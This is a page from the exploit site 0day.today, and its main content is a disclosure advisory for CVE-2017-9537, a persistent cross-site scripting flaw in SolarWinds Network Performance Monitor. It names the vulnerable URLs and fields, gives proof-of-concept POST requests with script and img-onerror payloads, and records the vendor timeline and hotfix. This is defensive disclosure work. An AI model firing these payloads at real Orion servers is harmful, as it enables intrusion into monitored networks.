0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
------------------------------------------------------------- Vulnerability type: Persistent Cross-Site Scripting ------------------------------------------------------------- Credit: Andy Tan CVE ID: CVE-2017-9537 ----------------------------------------------- Product: SolarWinds Network Performance Monitor ----------------------------------------------- Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1 1. Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx Affected parameter: City, Comments, Department Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page Navigation: (Settings -> Manage Nodes -> Add Node) 2. Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite Affected parameter: FullTitle Affected URL: https://<ip>/Orion/External.aspx?Site=<no> Navigation: (Settings -> All Settings -> External Websites) ================ Proof of Concept ================ 1. POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1 <Fill up rest of the headers> <Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E 2. POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1 <Fill up rest of the headers> {"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"} ------------------------ Vendor contact timeline: ------------------------ 2017-06-12: Contacted vendor. 2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone. 2017-08-22: Contacted vendor again. 2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3 2017-09-28: Contacted vendor again. 2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3 2017-09-29: Public disclosure. # 0day.today [2024-09-28] #